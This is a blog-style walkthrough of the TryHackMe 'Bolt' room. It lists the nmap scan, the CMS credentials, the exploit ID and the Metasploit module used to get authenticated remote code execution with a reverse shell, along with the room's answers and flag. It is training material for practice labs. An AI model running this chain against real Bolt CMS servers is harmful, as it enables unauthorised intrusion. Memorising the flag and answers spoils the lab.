CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


27/11/2024 Shad Hussain Knowledge Views 313 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Bolt - THM

Room Link : https://tryhackme.com/r/room/bolt STEP1 nmap -p- -sSV 10.10.174.222 -Pn -T4 -A FINDING 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 8000/tcp open http (PHP 7.2.32-1) What port number has a web server with a CMS running? 8000 ------------------------------------------------------------------------------------------------- STEP2 http://10.10.174.222:8000/ FINDING What is the username we can find in the CMS? bolt What is the password we can find for the username? boltadmin123 ------------------------------------------------------------------------------------------------- STEP3 I tried to search on Google for the Bolt CMS default login page address. ref : https://docs.boltcms.io/5.2/manual/login http://10.10.174.222:8000/bolt login bolt -- boltadmin123 FINDING What version of the CMS is installed on the server? (Ex: Name 1.1.1) Bolt 3.7.1 Theres an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. Whats its EDB-ID? 48296 ref : https://www.exploit-db.com/exploits/48296 ------------------------------------------------------------------------------------------------- STEP4 service postgresql start && msfconsole -q search exploit bolt FINDING Metasploit recently added an exploit module for this vulnerability. Whats the full path for this exploit? (Ex: exploit/....) exploit/unix/webapp/bolt_authenticated_rce ------------------------------------------------------------------------------------------------- STEP5 Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit cd /home cat flag.txt FINDING Look for flag.txt inside the machine. THM{wh0_d035nt_l0ve5_b0l7_r1gh7?} -------------------------------------------------------------------------------------------------

No article(s) with matching content

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 




© mutebreak.com | All Rights Reserved